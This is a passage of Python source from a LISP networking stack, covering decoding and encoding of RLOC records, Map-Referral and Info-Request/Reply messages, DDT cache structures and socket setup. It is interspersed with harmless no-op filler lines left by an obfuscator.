            curve_25519_suites = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
            if (cs_probe.cipher_suite in curve_25519_suites):
                if (cs_probe.cipher_suite == LISP_CS_25519_CBC):
                    key = lisp_keys(1, do_poly=False, do_chacha=False)
                if (cs_probe.cipher_suite == LISP_CS_25519_CHACHA):
                    key = lisp_keys(1, do_poly=True, do_chacha=True)
            else:
                key = lisp_keys(1, do_poly=False, do_chacha=False)

            packet = key.decode_lcaf(orig_packet, lcaf_len)
            if (packet == None): return(None)

            if (len(packet) < 2): return(None)
            afi = struct.unpack("H", packet[:2])[0]
            self.rloc.afi = socket.ntohs(afi)
            if (len(packet) < self.rloc.addr_length()): return(None)
            packet = self.rloc.unpack_address(packet[2:])
            if (packet == None): return(None)
            self.rloc.mask_len = self.rloc.host_mask_len()

            # A null RLOC carries no keying state worth storing.
            if (self.rloc.is_null()): return(packet)

            rloc_name_str = self.rloc_name
            if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)

            #
            # Merge the received keys with any state already stored.
            #
            stored_key = self.keys[1] if self.keys else None
            if (stored_key == None):
                if (key.remote_public_key == None):
                    msg = bold("No remote encap-public-key supplied", False)
                    lprint(" {} for {}".format(msg, rloc_name_str))
                    key = None
                else:
                    msg = bold("New encap-keying with new state", False)
                    lprint(" {} for {}".format(msg, rloc_name_str))
                    key.compute_shared_key("encap")

            if (stored_key):
                if (key.remote_public_key == None):
                    key = None
                    msg = bold("Remote encap-unkeying occurred", False)
                    lprint(" {} for {}".format(msg, rloc_name_str))
                elif (stored_key.compare_keys(key)):
                    key = stored_key
                    lprint(" Maintain stored encap-keys for {}".format(
                        rloc_name_str))
                else:
                    if (stored_key.remote_public_key == None):
                        msg = "New encap-keying for existing state"
                    else:
                        msg = "Remote encap-rekeying"
                    lprint(" {} for {}".format(bold(msg, False),
                        rloc_name_str))
                    stored_key.remote_public_key = key.remote_public_key
                    stored_key.compute_shared_key("encap")
                    key = stored_key

            self.keys = [None, key, None, None]
        else:

            #
            # Skip over unsupported LCAF types.
            #
            packet = packet[lcaf_len:]
        return(packet)

    def decode(self, packet, nonce):
        """Decode one RLOC-record; return the remaining packet or None."""
        fmt = "BBBBHH"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return(None)

        self.priority, self.weight, self.mpriority, self.mweight, flags, \
            afi = struct.unpack(fmt, packet[:size])

        flags = socket.ntohs(flags)
        afi = socket.ntohs(afi)
        self.local_bit = bool(flags & 0x0004)
        self.probe_bit = bool(flags & 0x0002)
        self.reach_bit = bool(flags & 0x0001)

        if (afi == LISP_AFI_LCAF):
            # Back up over the AFI so decode_lcaf() sees the LCAF header.
            packet = self.decode_lcaf(packet[size - 2:], nonce)
        else:
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet[size:])
            self.rloc.mask_len = self.rloc.host_mask_len()
        return(packet)

    def end_of_rlocs(self, packet, rloc_count):
        """Skip over rloc_count RLOC-records; return remainder or None."""
        for _ in range(rloc_count):
            packet = self.decode(packet, None)
            if (packet == None): return(None)
        return(packet)
if 87 - 87: oO0o + I1IiiI * I1Ii111 * o0oOOo0O0Ooo + O0
if 21 - 21: I1Ii111 + OoOoOO00 + OoOoOO00 . II111iiii / I1Ii111 . I1IiiI
if 66 - 66: I1Ii111 % oO0o . iII111i * i1IIi
if 81 - 81: OoooooooOO * I1IiiI / I1Ii111
if 10 - 10: I1IiiI - II111iiii / IiII * II111iiii
if 67 - 67: II111iiii . Ii1I % oO0o . Oo0Ooo + IiII
if 10 - 10: OOooOOo - OoO0O00 * oO0o / iIii1I11I1II1 - OoOoOO00
if 20 - 20: IiII % I1IiiI + iIii1I11I1II1 % iII111i
if 100 - 100: o0oOOo0O0Ooo - Oo0Ooo % I1Ii111 . i11iIiiIii % OoooooooOO
if 39 - 39: I1ii11iIi11i / i11iIiiIii * i1IIi * Oo0Ooo
if 39 - 39: OoO0O00 * OoooooooOO / i1IIi + Oo0Ooo
if 57 - 57: O0
if 83 - 83: OOooOOo / Ii1I * I1IiiI % oO0o / iIii1I11I1II1
if 1 - 1: I11i / OoooooooOO / iII111i
if 68 - 68: i1IIi / Oo0Ooo / I11i * Oo0Ooo
if 91 - 91: OoO0O00 . iII111i
if 82 - 82: I1ii11iIi11i / Oo0Ooo
if 63 - 63: I1IiiI
if 3 - 3: iII111i + I1ii11iIi11i
if 35 - 35: oO0o * iII111i * oO0o * I1Ii111 * IiII * i1IIi
if 43 - 43: OoO0O00 * I1IiiI / IiII . i11iIiiIii + iII111i + o0oOOo0O0Ooo
if 1 - 1: I1IiiI % o0oOOo0O0Ooo . I1Ii111 + I11i * oO0o
if 41 - 41: OoO0O00 * oO0o - II111iiii
if 2 - 2: IiII + IiII - OoO0O00 * iII111i . oO0o
if 91 - 91: ooOoO0o
if 22 - 22: ooOoO0o % OoO0O00 * OoOoOO00 + Oo0Ooo
if 44 - 44: O0 - I11i
if 43 - 43: O0
if 50 - 50: I11i - OoooooooOO
if 29 - 29: oO0o * oO0o
class lisp_map_referral():
    """A LISP-DDT Map-Referral message header.

    Wire format: a 32-bit first-long carrying the message type in the top
    nibble and the record count in the low byte, followed by the 64-bit
    nonce echoed from the soliciting Map-Request.
    """

    def __init__(self):
        self.record_count = 0
        self.nonce = 0

    def print_map_referral(self):
        """Log a one-line summary of this Map-Referral."""
        lprint("{} -> record-count: {}, nonce: 0x{}".format(
            bold("Map-Referral", False), self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        """Pack the header: type/record-count first-long plus nonce."""
        first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
        header = struct.pack("I", socket.htonl(first_long))
        return(header + struct.pack("Q", self.nonce))

    def decode(self, packet):
        """Parse the header from packet; return the remainder or None."""
        size = struct.calcsize("I")
        if (len(packet) < size): return(None)

        first_long = socket.ntohl(struct.unpack("I", packet[:size])[0])
        self.record_count = first_long & 0xff
        packet = packet[size:]

        size = struct.calcsize("Q")
        if (len(packet) < size): return(None)

        self.nonce = struct.unpack("Q", packet[:size])[0]
        return(packet[size:])
if 86 - 86: IiII
if 71 - 71: Ii1I - i1IIi . I1IiiI
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * II111iiii + i11iIiiIii % Ii1I
class lisp_ddt_entry():
    """One DDT cache entry: an (EID, group) tuple plus the set of
    delegation nodes authoritative for it."""

    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.delegation_set = []
        self.source_cache = None
        self.map_referrals_sent = 0

    def is_auth_prefix(self):
        """True for an authoritative prefix: no delegations and not (*,G)."""
        if (len(self.delegation_set) != 0): return (False)
        if (self.is_star_g()): return (False)
        return (True)

    def is_ms_peer_entry(self):
        """True when the first delegation node is a Map-Server peer."""
        if (len(self.delegation_set) == 0): return (False)
        return (self.delegation_set[0].is_ms_peer())

    def print_referral_type(self):
        """Describe the referral type of the first delegation node."""
        if (len(self.delegation_set) == 0): return ("unknown")
        first_node = self.delegation_set[0]
        return (first_node.print_node_type())

    def print_eid_tuple(self):
        """Return the printable (EID, group) tuple for this entry."""
        return (lisp_print_eid_tuple(self.eid, self.group))

    def add_cache(self):
        """Insert this entry into the global DDT cache.

        Unicast entries go in directly; multicast entries are stored as
        source entries under a per-group parent entry, creating the
        parent on first use.
        """
        if (self.group.is_null()):
            lisp_ddt_cache.add_cache(self.eid, self)
            return

        parent = lisp_ddt_cache.lookup_cache(self.group, True)
        if (parent == None):
            parent = lisp_ddt_entry()
            parent.eid.copy_address(self.group)
            parent.group.copy_address(self.group)
            lisp_ddt_cache.add_cache(self.group, parent)

        if (self.eid.is_null()): self.eid.make_default_route(parent.group)
        parent.add_source_entry(self)

    def add_source_entry(self, source_ddt):
        """Add a source-specific entry beneath this (*,G) entry."""
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ddt.eid, source_ddt)

    def lookup_source_cache(self, source, exact):
        """Look up *source* under this group entry; None when no cache."""
        if (self.source_cache == None): return (None)
        return (self.source_cache.lookup_cache(source, exact))

    def is_star_g(self):
        """True when this entry is a (*,G): group set and EID == group."""
        if (self.group.is_null()): return (False)
        return (self.eid.is_exact_match(self.group))
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
if 95 - 95: iII111i / ooOoO0o + I1Ii111
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
class lisp_ddt_node():
    """A delegation node inside a DDT entry: where to refer a query,
    plus role flags (DDT child, Map-Server child, or Map-Server peer)."""

    def __init__(self):
        self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.map_server_peer = False
        self.map_server_child = False
        self.priority = 0
        self.weight = 0

    def print_node_type(self):
        """Return a human-readable name for this node's role."""
        if (self.is_ddt_child()): return ("ddt-child")
        if (self.is_ms_child()): return ("map-server-child")
        if (self.is_ms_peer()): return ("map-server-peer")

    def is_ddt_child(self):
        """A DDT child is a node that is neither an MS child nor MS peer."""
        return (not self.map_server_child and not self.map_server_peer)

    def is_ms_child(self):
        return (self.map_server_child)

    def is_ms_peer(self):
        return (self.map_server_peer)
if 48 - 48: O0 . I11i
if 9 - 9: oO0o / Oo0Ooo
if 85 - 85: i11iIiiIii / I1IiiI . OoO0O00 . I11i . oO0o * IiII
if 41 - 41: Ii1I / OoO0O00 / OoO0O00 * I11i
if 31 - 31: Ii1I / OoooooooOO % iIii1I11I1II1 - IiII * I1IiiI - O0
if 31 - 31: oO0o
if 74 - 74: OoO0O00
class lisp_ddt_map_request():
    """State for a Map-Request being iterated through the DDT hierarchy.

    The request is queued (indexed by nonce) while referrals are chased;
    a retransmit timer re-sends it until it is answered or abandoned.
    """

    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet
        self.eid = eid
        self.group = group
        self.nonce = nonce
        self.mr_source = None
        self.sport = 0
        self.itr = None                         # requesting (P)ITR address
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]

    def print_ddt_map_request(self):
        """Log a one-line summary of this queued Map-Request."""
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format(
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False), self.nonce))

    def queue_map_request(self):
        """Start the retransmit timer and index this request by nonce."""
        self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self

    def dequeue_map_request(self):
        """Cancel the retransmit timer and remove this request from the
        queue, if still present."""
        self.retransmit_timer.cancel()
        # Fixed: dict.has_key() is Python-2-only; the "in" operator is
        # behavior-identical and works on both Python 2 and 3.
        if (str(self.nonce) in lisp_ddt_map_requestQ):
            lisp_ddt_map_requestQ.pop(str(self.nonce))

    def print_eid_tuple(self):
        """Return the printable (EID, group) tuple for this request."""
        return (lisp_print_eid_tuple(self.eid, self.group))
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if 34 - 34: i1IIi % Oo0Ooo . oO0o
if 36 - 36: I1ii11iIi11i / I1Ii111 - IiII + OOooOOo + I1Ii111
if 62 - 62: Oo0Ooo . OoO0O00 * I1Ii111 . i11iIiiIii * O0
if 10 - 10: Oo0Ooo / OoOoOO00 * OOooOOo - IiII + Ii1I
if 62 - 62: I1IiiI . Ii1I
if 74 - 74: Ii1I - I11i % ooOoO0o - I1IiiI - Ii1I - II111iiii
if 81 - 81: i1IIi * I1ii11iIi11i + IiII - OoO0O00 * i1IIi
if 6 - 6: iIii1I11I1II1 % OoOoOO00 % II111iiii % o0oOOo0O0Ooo
if 52 - 52: Ii1I - I1IiiI * iIii1I11I1II1 % Oo0Ooo * OOooOOo
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
if 40 - 40: OoOoOO00 - II111iiii
if 29 - 29: I1IiiI - O0
if 36 - 36: I1IiiI * I1IiiI
if 79 - 79: I1Ii111 - I11i
if 49 - 49: II111iiii + O0 * ooOoO0o - Oo0Ooo
if 89 - 89: I1IiiI + I11i . oO0o . II111iiii + oO0o / Oo0Ooo
if 32 - 32: OoO0O00 % oO0o * I1ii11iIi11i + I11i / I1Ii111
# Map-Referral action codes (LISP-DDT, RFC 8111). The negative values are
# internal pseudo-actions that never appear on the wire.
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 5 - 5: o0oOOo0O0Ooo + iII111i / OoooooooOO + Ii1I . OoOoOO00 / oO0o
# Printable names indexed by the non-negative action codes above.
lisp_map_referral_action_string = [
    "node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
    "delegation-hole" , "not-authoritative" ]
if 18 - 18: II111iiii . o0oOOo0O0Ooo
if 75 - 75: OoooooooOO - Oo0Ooo
if 56 - 56: II111iiii - i11iIiiIii - oO0o . o0oOOo0O0Ooo
if 4 - 4: i1IIi
if 91 - 91: IiII . OoO0O00 * Ii1I / o0oOOo0O0Ooo
if 41 - 41: I1IiiI . OoO0O00 / i1IIi . Oo0Ooo . oO0o
if 44 - 44: iII111i * I11i + i11iIiiIii + i1IIi / IiII * II111iiii
if 58 - 58: OOooOOo
if 72 - 72: OoO0O00 + OOooOOo - Oo0Ooo % ooOoO0o . IiII
if 95 - 95: iII111i % OOooOOo - IiII - OoOoOO00 % o0oOOo0O0Ooo * O0
if 16 - 16: I1Ii111 / Oo0Ooo
if 48 - 48: Oo0Ooo / oO0o + iII111i % iII111i
if 9 - 9: I1ii11iIi11i - o0oOOo0O0Ooo . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 30 - 30: OoooooooOO - iIii1I11I1II1 / oO0o * Ii1I / Ii1I
if 52 - 52: OoOoOO00 - OoO0O00 + I1IiiI + IiII
if 49 - 49: oO0o / I11i - oO0o
if 31 - 31: OoOoOO00 + I1IiiI + I1ii11iIi11i + I11i * II111iiii % oO0o
if 90 - 90: OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
if 100 - 100: Oo0Ooo % OoO0O00 - OoOoOO00
if 46 - 46: o0oOOo0O0Ooo
if 28 - 28: i1IIi
if 81 - 81: oO0o % OoooooooOO . I1Ii111 - OoOoOO00 / I1IiiI
if 62 - 62: I1Ii111 * I11i / I11i
if 42 - 42: ooOoO0o * ooOoO0o / Ii1I / OOooOOo * OOooOOo
if 92 - 92: Oo0Ooo / iII111i - OoooooooOO - o0oOOo0O0Ooo % ooOoO0o
if 35 - 35: i1IIi % iII111i % I11i * iIii1I11I1II1 % Ii1I - Oo0Ooo
if 94 - 94: iII111i
if 68 - 68: OoooooooOO % OOooOOo / OoooooooOO / I1Ii111 + Ii1I - o0oOOo0O0Ooo
if 81 - 81: I1IiiI
if 62 - 62: Ii1I * OoOoOO00
if 27 - 27: Oo0Ooo + Oo0Ooo / II111iiii % I1Ii111
if 11 - 11: Ii1I
if 54 - 54: I1IiiI * I1Ii111 / ooOoO0o / iIii1I11I1II1 % iII111i / oO0o
if 11 - 11: ooOoO0o + I1IiiI + Ii1I . II111iiii
if 50 - 50: Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
class lisp_info():
    """A LISP Info-Request/Info-Reply message (NAT traversal).

    An Info-Request carries the sender's hostname. An Info-Reply returns
    the sender's translated (global) RLOC and ports as seen by the
    map-server, the private RLOC, and the list of RTRs to use.
    """

    def __init__(self):
        self.info_reply = False       # False => Info-Request, truthy => Reply
        self.nonce = 0
        self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.ms_port = 0
        self.etr_port = 0
        self.rtr_list = []
        self.hostname = lisp_hostname

    def print_info(self):
        """Log a one-line summary of this Info-Request or Info-Reply."""
        if (self.info_reply):
            msg_type = "Info-Reply"
            line = (", ms-port: {}, etr-port: {}, global-rloc: {}, " +
                "ms-rloc: {}, private-rloc: {}, RTR-list: ").format(
                self.ms_port, self.etr_port,
                red(self.global_etr_rloc.print_address_no_iid(), False),
                red(self.global_ms_rloc.print_address_no_iid(), False),
                red(self.private_etr_rloc.print_address_no_iid(), False))
            if (len(self.rtr_list) == 0): line += "empty, "
            for rtr in self.rtr_list:
                line += red(rtr.print_address_no_iid(), False) + ", "

            line = line[0:-2]
        else:
            msg_type = "Info-Request"
            name = "<none>" if self.hostname == None else self.hostname
            line = ", hostname: {}".format(blue(name, False))

        lprint("{} -> nonce: 0x{}{}".format(bold(msg_type, False),
            lisp_hex_string(self.nonce), line))

    def encode(self):
        """Build the wire form of this message and return the buffer."""
        header = (LISP_NAT_INFO << 28)
        if (self.info_reply): header |= (1 << 27)

        #
        # Common header: type/R-bit word, 64-bit nonce, then three zero
        # longs covering key-id, auth-length, TTL and reserved fields.
        #
        buf = struct.pack("I", socket.htonl(header))
        buf += struct.pack("Q", self.nonce)
        buf += struct.pack("III", 0, 0, 0)

        #
        # Info-Request: append AFI-name encoded hostname and finish.
        #
        if (self.info_reply == False):
            if (self.hostname == None):
                buf += struct.pack("H", 0)
            else:
                buf += struct.pack("H", socket.htons(LISP_AFI_NAME))
                buf += self.hostname + "\0"

            return (buf)

        #
        # Info-Reply: NAT-traversal LCAF carrying ms-port, etr-port, the
        # global and private ETR RLOCs, and the RTR list.
        #
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_type = LISP_LCAF_NAT_TYPE
        lcaf_len = socket.htons(16)
        ms_port = socket.htons(self.ms_port)
        etr_port = socket.htons(self.etr_port)
        buf += struct.pack("HHBBHHHH", lcaf_afi, 0, lcaf_type, 0, lcaf_len,
            ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
        buf += self.global_etr_rloc.pack_address()
        buf += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
        buf += self.private_etr_rloc.pack_address()
        if (len(self.rtr_list) == 0): buf += struct.pack("H", 0)

        #
        # Trailing RTR list: AFI-prefixed addresses.
        #
        for rtr in self.rtr_list:
            buf += struct.pack("H", socket.htons(rtr.afi))
            buf += rtr.pack_address()

        return (buf)

    def decode(self, packet):
        """Parse an Info-Request/Info-Reply from *packet*.

        Returns the caller's original buffer on success (the caller keeps
        it intact), or None when the message is malformed.
        """
        orig_packet = packet
        fmt = "I"
        fmt_len = struct.calcsize(fmt)
        if (len(packet) < fmt_len): return (None)

        header = struct.unpack(fmt, packet[:fmt_len])
        header = header[0]
        packet = packet[fmt_len::]

        fmt = "Q"
        fmt_len = struct.calcsize(fmt)
        if (len(packet) < fmt_len): return (None)

        nonce = struct.unpack(fmt, packet[:fmt_len])

        header = socket.ntohl(header)
        self.nonce = nonce[0]
        self.info_reply = header & 0x08000000
        self.hostname = None
        packet = packet[fmt_len::]

        #
        # Key-id and authentication length; a non-zero auth length is not
        # supported on Info messages.
        #
        fmt = "HH"
        fmt_len = struct.calcsize(fmt)
        if (len(packet) < fmt_len): return (None)

        key_id, auth_len = struct.unpack(fmt, packet[:fmt_len])
        if (auth_len != 0): return (None)

        packet = packet[fmt_len::]
        fmt = "IBBH"
        fmt_len = struct.calcsize(fmt)
        if (len(packet) < fmt_len): return (None)

        ttl, reserved, lcaf_type, rloc_afi = struct.unpack(fmt,
            packet[:fmt_len])

        if (rloc_afi != 0): return (None)
        packet = packet[fmt_len::]

        #
        # Info-Request: optionally parse the AFI-name encoded hostname,
        # then return the whole original buffer.
        #
        if (self.info_reply == False):
            fmt = "H"
            fmt_len = struct.calcsize(fmt)
            if (len(packet) >= fmt_len):
                afi = struct.unpack(fmt, packet[:fmt_len])[0]
                if (socket.ntohs(afi) == LISP_AFI_NAME):
                    packet = packet[fmt_len::]
                    packet, self.hostname = lisp_decode_dist_name(packet)

            return (orig_packet)

        #
        # Info-Reply: NAT-traversal LCAF with ports and RLOCs.
        #
        fmt = "HHBBHHH"
        fmt_len = struct.calcsize(fmt)
        if (len(packet) < fmt_len): return (None)

        afi, rsvd, lcaf_type, flags, lcaf_len, ms_port, etr_port = \
            struct.unpack(fmt, packet[:fmt_len])

        if (socket.ntohs(afi) != LISP_AFI_LCAF): return (None)

        self.ms_port = socket.ntohs(ms_port)
        self.etr_port = socket.ntohs(etr_port)
        packet = packet[fmt_len::]

        #
        # Global ETR RLOC (the NAT's outside address).
        #
        fmt = "H"
        fmt_len = struct.calcsize(fmt)
        if (len(packet) < fmt_len): return (None)

        afi = struct.unpack(fmt, packet[:fmt_len])[0]
        packet = packet[fmt_len::]
        if (afi != 0):
            self.global_etr_rloc.afi = socket.ntohs(afi)
            packet = self.global_etr_rloc.unpack_address(packet)
            if (packet == None): return (None)
            self.global_etr_rloc.mask_len = \
                self.global_etr_rloc.host_mask_len()

        #
        # Global map-server RLOC; truncation here is tolerated -- return
        # what has been parsed so far.
        #
        if (len(packet) < fmt_len): return (orig_packet)

        afi = struct.unpack(fmt, packet[:fmt_len])[0]
        packet = packet[fmt_len::]
        if (afi != 0):
            self.global_ms_rloc.afi = socket.ntohs(afi)
            packet = self.global_ms_rloc.unpack_address(packet)
            if (packet == None): return (orig_packet)
            self.global_ms_rloc.mask_len = \
                self.global_ms_rloc.host_mask_len()

        #
        # Private ETR RLOC.
        #
        if (len(packet) < fmt_len): return (orig_packet)

        afi = struct.unpack(fmt, packet[:fmt_len])[0]
        packet = packet[fmt_len::]
        if (afi != 0):
            self.private_etr_rloc.afi = socket.ntohs(afi)
            packet = self.private_etr_rloc.unpack_address(packet)
            if (packet == None): return (orig_packet)
            self.private_etr_rloc.mask_len = \
                self.private_etr_rloc.host_mask_len()

        #
        # Trailing RTR list: AFI-prefixed addresses until the buffer runs
        # out; AFI 0 placeholders are skipped.
        #
        while (len(packet) >= fmt_len):
            afi = struct.unpack(fmt, packet[:fmt_len])[0]
            packet = packet[fmt_len::]
            if (afi == 0): continue
            rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
            packet = rtr.unpack_address(packet)
            if (packet == None): return (orig_packet)
            rtr.mask_len = rtr.host_mask_len()
            self.rtr_list.append(rtr)

        return (orig_packet)
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
class lisp_nat_info():
    """What we learned about one NATed xTR from its Info-Request:
    translated address, hostname, and translated port."""

    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()

    def timed_out(self):
        """True when no Info-Request has refreshed this entry for two
        report intervals."""
        elapsed = time.time() - self.uptime
        return (elapsed >= (LISP_INFO_INTERVAL * 2))
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
class lisp_info_source():
    """The source of an Info-Request: its RLOC, port, and hostname,
    indexed globally by address and by nonce."""

    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False

    def cache_address_for_info_source(self):
        """Index this source by its (address, hostname) pair."""
        key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[key] = self

    def cache_nonce_for_info_source(self, nonce):
        """Remember *nonce* so the matching Info-Reply can find us."""
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
if 64 - 64: OoooooooOO
if 25 - 25: IiII
if 29 - 29: OoOoOO00 % ooOoO0o * OoooooooOO
if 8 - 8: i11iIiiIii - I1Ii111 / IiII
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
    """Reassemble an authentication hash from its unpacked words.

    On x86 (little-endian) hosts the unpacked words arrive byte-swapped,
    so swap them back first; for SHA-1-96 the third word is only 32 bits
    wide. Each word is then rendered as zero-filled hex and concatenated
    into one hash string.
    """
    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            auth3 = socket.ntohl(auth3) if (alg_id == LISP_SHA_1_96_ALG_ID) \
                else byte_swap_64(auth3)
        if (auth4 != ""): auth4 = byte_swap_64(auth4)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        # 160-bit hash: two 64-bit words plus one 32-bit word.
        auth_data = (lisp_hex_string(auth1).zfill(16) +
            lisp_hex_string(auth2).zfill(16) +
            lisp_hex_string(auth3).zfill(8))

    if (alg_id == LISP_SHA_256_128_ALG_ID):
        # 256-bit hash: four 64-bit words.
        auth_data = (lisp_hex_string(auth1).zfill(16) +
            lisp_hex_string(auth2).zfill(16) +
            lisp_hex_string(auth3).zfill(16) +
            lisp_hex_string(auth4).zfill(16))

    return (auth_data)
if 1 - 1: II111iiii
if 94 - 94: I1ii11iIi11i * iII111i % iII111i % I11i - iII111i
if 38 - 38: IiII - OoO0O00 % Ii1I - II111iiii
if 97 - 97: O0 . Ii1I
if 52 - 52: IiII
if 86 - 86: I1Ii111 / O0 + OoooooooOO % oO0o
if 45 - 45: I1IiiI . Oo0Ooo . I11i . Ii1I
if 81 - 81: II111iiii + OoOoOO00 % i11iIiiIii / iII111i . I1Ii111 + II111iiii
if 48 - 48: I1IiiI . I1ii11iIi11i * OoOoOO00 % i1IIi / I1Ii111 * II111iiii
if 62 - 62: o0oOOo0O0Ooo * I1Ii111 . iIii1I11I1II1 / i1IIi
def lisp_open_listen_socket(local_addr, port):
    """Open a datagram socket to receive on.

    When *port* is a decimal string, open an IPv4 or IPv6 UDP socket
    (chosen from the form of *local_addr*: "." => IPv4, ":" => IPv6)
    bound to (local_addr, port); returns None for IPv6 on Raspbian.
    Otherwise *port* names a Unix-domain socket path to bind.

    NOTE(review): a *local_addr* containing neither "." nor ":" leaves
    the socket variable unbound and raises -- presumably callers always
    pass a valid literal address; confirm before hardening.
    """
    if (port.isdigit()):
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return (None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)

        sock.bind((local_addr, int(port)))
    else:
        sock_path = port

        #
        # Remove a stale socket file before rebinding. Fixed: use
        # os.remove() instead of os.system("rm " + path) -- no shell,
        # so paths with spaces or metacharacters are safe.
        #
        if (os.path.exists(sock_path)):
            try:
                os.remove(sock_path)
            except OSError:
                pass                  # best effort, as "rm" was
            time.sleep(1)

        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
